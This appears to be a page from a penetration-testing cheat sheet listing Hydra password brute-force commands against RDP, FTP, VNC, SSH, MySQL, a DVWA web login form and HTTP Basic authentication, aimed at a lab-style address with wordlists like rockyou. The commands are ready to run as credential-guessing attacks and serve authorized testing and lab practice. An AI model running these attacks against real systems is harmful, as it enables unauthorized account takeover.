Hydra

Hydra Brute Force

RDP

hydra -t 4 -V -f -l administrator -P rockyou.txt rdp://10.10.10.10
    -t: number of tasks run in parallel
    -V: verbose
    -f: quit once correct credentials found
    -l: username
    -P: passwords on a file

FTP

hydra -t 5 -V -f -L userlist -P passwordlist ftp://10.10.10.10
    -t: number of tasks run in parallel
    -V: verbose
    -f: quit once correct credentials found
    -l: username list
    -P: password list

VNC

hydra -P passwordlist -t 1 -w 5 -f -s 5901 10.10.10.10 vnc -v
    -s: port to connect to

SSH

hydra -l admin -P passwordlist ssh://10.10.10.10 -V

MySQL

hydra -l root -P /usr/share/wordlists/rockyou.txt 10.10.10.10 mysql -t 4

hydra 10.10.10.10 -V -l admin -P passwordlist http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=tjflbmwot3dqbj1ph3tmjchel2; security=low"

Basic Authentication

hydra -l username -P /path/to/wordlist -f 10.10.10.10 http-get /directory
hydra -l username -P /path/to/wordlist -f 10.10.10.10 http-get -s 8080

PreviousPasswords NextMedusa

Last updated 4 years ago

Was this helpful?

RDP

FTP

VNC

SSH

MySQL

Web Login

Basic Authentication